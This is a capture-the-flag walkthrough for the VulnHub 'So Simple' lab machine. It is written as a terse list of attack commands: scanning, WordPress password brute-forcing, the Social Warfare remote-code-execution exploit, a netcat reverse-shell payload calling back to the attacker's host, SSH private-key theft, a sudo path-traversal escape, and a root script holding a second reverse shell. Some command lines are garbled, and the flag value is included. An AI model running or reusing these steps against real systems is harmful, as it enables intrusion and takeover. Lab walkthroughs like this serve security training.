CTF Walk Through - So Simple

CTF Walk Through | HackProof Academy | [email protected]


2 subscriber(s)

04/01/2025 Shad Hussain Knowledge Views 126 Comments 0 Analytics Video English DMCA Add Favorite Copy Link

CTF Walk Through - So Simple - VulnHub


Machine Link : https://www.vulnhub.com/entry/so-simple-1,515/


STEP1
arp-scan -l
FINDING
192.168.31.103
----------------------------------------------------------------------------------------------------------
STEP2
nmap 192.168.31.103 -p- -Pn -A -T4 -sSV
FINDING
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
----------------------------------------------------------------------------------------------------------
STEP3
dirb http://192.168.31.103/ 
FINDING
http://192.168.31.103/wordpress/index.php

http://192.168.31.103/wordpress/wp-admin/admin.php 
site is a wordpress site
----------------------------------------------------------------------------------------------------------
STEP4
wpscan --url http://192.168.31.103/wordpress/ -e at -e ap -e u
FINDING
Upload directory has listing enabled: http://192.168.31.103/wordpress/wp-content/uploads/

admin -- user
max   -- user
----------------------------------------------------------------------------------------------------------
STEP5
wpscan --url http://192.168.31.103/wordpress -U max,admin -P /usr/share/wordlists/rockyou.txt
FINDING
plugins -- social-warfare -- The version is out of date -- Version: 3.5.0
plugins -- simple-cart-solution -- The version is out of date -- Version: 0.2.0 
[SUCCESS] - max / opensesame -- password found
----------------------------------------------------------------------------------------------------------
STEP6
login do not help anything
searchsploit Social Warfare 3.5
FINDING
WordPress Plugin Social Warfare  3.5.3 - Remote Code Execution                     | php/webapps/46794.py
----------------------------------------------------------------------------------------------------------
STEP7
download the exploit
from exploitdb
python2 46794.py -h
FINDING
Options:
  -h, --help            show this help message and exit
  -t TARGET, --target=TARGET
                        Target Link
  --payload-uri=PAYLOAD
                        URI where the file payload.txt is located.
----------------------------------------------------------------------------------------------------------
STEP8
create payload.txt on desktop with -- presystem(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&1|nc 192.168.31.28 4321 /tmp/f)/pre
start python3 server -- python3 -m http.server 80
one new terminal start listner -- nc -nvlp 4321
on another terminal upload the payload --  python2 46794.py -t http://192.168.31.103/wordpress/ --payload-uri=http://192.168.31.28/payload.txt

and get the shell on nc listner
----------------------------------------------------------------------------------------------------------
STEP9
cd /home
ls -la
cat personal.txt
FINDING
SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=
https://hashes.com/en/decrypt/hash

SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=:Hahahahaha, its not that easy !!!
----------------------------------------------------------------------------------------------------------
STEP10
cd max
ls -la
cd .ssh
cat id_rsa
copy it and paster in local machine
chmod 666 id_rsa
----------------------------------------------------------------------------------------------------------
STEP11
ssh [email protected] -i id_rsa
ls -la
cat user.txt
073dafccfe902526cee753455ff1dbb0
sudo -l
(steven) NOPASSWD: /usr/sbin/service
----------------------------------------------------------------------------------------------------------
STEP12
sudo -u steven /usr/sbin/service ../../bin/sh
whoami
steven
sudo -l
(root) NOPASSWD: /opt/tools/server-health.sh
----------------------------------------------------------------------------------------------------------
STEP13
create a folder tool and under it a file.sh 
cd /opt
mkdir tools
echo echo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&1|nc 192.168.31.28 4322 /tmp/f  server-health.sh
chmod +x server-health.sh
(STEP14)
sudo /opt/tools/server-health.sh
----------------------------------------------------------------------------------------------------------
STEP14
open nc on new terminal
nc -nvlp 4322
whoami
root
cd /root
cat flag.txt

  /$$$$$$                                                     /$$              /$$                                   
 /$$__  $$                                                   | $$             | $$                                   
| $$  \__/  /$$$$$$  /$$$$$$$   /$$$$$$   /$$$$$$  /$$$$$$  /$$$$$$  /$$$$$$$$| $$                                   
| $$       /$$__  $$| $$__  $$ /$$__  $$ /$$__  $$|____  $$|_  $$_/ |____ /$$/| $$                                   
| $$      | $$  \ $$| $$  \ $$| $$  \ $$| $$  \__/ /$$$$$$$  | $$      /$$$$/ |__/                                   
| $$    $$| $$  | $$| $$  | $$| $$  | $$| $$      /$$__  $$  | $$ /$$ /$$__/                                         
|  $$$$$$/|  $$$$$$/| $$  | $$|  $$$$$$$| $$     |  $$$$$$$  |  $$$$//$$$$$$$$ /$$                                   
 \______/  \______/ |__/  |__/ \____  $$|__/      \_______/   \___/ |________/|__/                                   
                               /$$  \ $$                                                                             
                              |  $$$$$$/                                                                             
                               \______/                                                                              
 /$$     /$$                  /$$                                                                           /$$      
|  $$   /$$/                 | $/                                                                          | $$      
 \  $$ /$$//$$$$$$  /$$   /$$|_//$$    /$$ /$$$$$$         /$$$$$$  /$$  /$$  /$$ /$$$$$$$   /$$$$$$   /$$$$$$$      
  \  $$$$//$$__  $$| $$  | $$  |  $$  /$$//$$__  $$       /$$__  $$| $$ | $$ | $$| $$__  $$ /$$__  $$ /$$__  $$      
   \  $$/| $$  \ $$| $$  | $$   \  $$/$$/| $$$$$$$$      | $$  \ $$| $$ | $$ | $$| $$  \ $$| $$$$$$$$| $$  | $$      
    | $$ | $$  | $$| $$  | $$    \  $$$/ | $$_____/      | $$  | $$| $$ | $$ | $$| $$  | $$| $$_____/| $$  | $$      
    | $$ |  $$$$$$/|  $$$$$$/     \  $/  |  $$$$$$$      | $$$$$$$/|  $$$$$/$$$$/| $$  | $$|  $$$$$$$|  $$$$$$$      
    |__/  \______/  \______/       \_/    \_______/      | $$____/  \_____/\___/ |__/  |__/ \_______/ \_______/      
                                                         | $$                                                        
 /$$ /$$$$$$                   /$$$$$$  /$$              | $$       /$$          /$$                                 
| $//$$__  $$                 /$$__  $$|__/              |__/      | $$         | $/                                 
|_/| $$  \__/  /$$$$$$       | $$  \__/ /$$ /$$$$$$/$$$$   /$$$$$$ | $$  /$$$$$$|_/                                  
   |  $$$$$$  /$$__  $$      |  $$$$$$ | $$| $$_  $$_  $$ /$$__  $$| $$ /$$__  $$                                    
    \____  $$| $$  \ $$       \____  $$| $$| $$ \ $$ \ $$| $$  \ $$| $$| $$$$$$$$                                    
    /$$  \ $$| $$  | $$       /$$  \ $$| $$| $$ | $$ | $$| $$  | $$| $$| $$_____/                                    
   |  $$$$$$/|  $$$$$$/      |  $$$$$$/| $$| $$ | $$ | $$| $$$$$$$/| $$|  $$$$$$$                                    
    \______/  \______/        \______/ |__/|__/ |__/ |__/| $$____/ |__/ \_______/                                    
                                                         | $$                                                        
                                                         | $$                                                        
                                                         |__/                                                        

Easy box right? Hope youve had fun! Show me the flag on Twitter @roelvb79
----------------------------------------------------------------------------------------------------------

	12.01.2025 Shad Hussain Readers 88
CTF Walk Through - DC9 - VulnHub Machine link : https://www.vulnhub.com/entry/dc-9,412/ STEP1 arp-scan -l F ..... Read all...

	23.12.2024 Kaushal Kumar Readers 143
DARKEST SIDES OF WOMEN YOU DONT KNOW ❤️ 1. A woman can never love two men at the same time. It is always one. If you ar ..... Read all...

	23.12.2024 Shad Hussain Readers 265
CTF Walk Through - DC7 - VulnHub Machine Link : https://www.vulnhub.com/entry/dc-7,356/ STEP1 nmap 192.168.3 ..... Read all...

	12.12.2024 Shad Hussain Readers 242
CTF Walk Through - OverlayFS - THM Room Link : https://tryhackme.com/r/room/overlayfs STEP1 Username: overlay ..... Read all...

	06.12.2024 Manorama Kumari Readers 379
*पति की आवश्यकता क्यों ? :: 😊😊 एक महिला एक मनोचिकित्सक के पास गई और उससे बोली कि *"मैं शादी नहीं करना चाहती.. ..... Read all...

	06.12.2024 Shad Hussain Readers 263
CTF Walk Through - DC6 - VulnHub Machine Link : https://www.vulnhub.com/entry/dc-6,315/ STEP1 arp-scan -l F ..... Read all...

	05.12.2024 Shad Hussain Readers 275
CTF Walk Through - Ice - THM Room Link : https://tryhackme.com/r/room/ice STEP1 nmap -Pn -sSV 10.10.98.2 ..... Read all...

	05.12.2024 Shad Hussain Readers 275
CTF Walk Through - LazyAdmin - THM Room Link : https://tryhackme.com/r/room/lazyadmin STEP1 nmap 10.10.87.228 ..... Read all...

	04.12.2024 Shad Hussain Readers 287
CTF Walk Through - Vulnversity - THM Room Link : https://tryhackme.com/r/room/vulnversity STEP1 nmap -p- -sSV 10 ..... Read all...

WhatsApp no. else use your mail id to get the otp...! Please tick to get otp in your mail id...!

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)

Related articles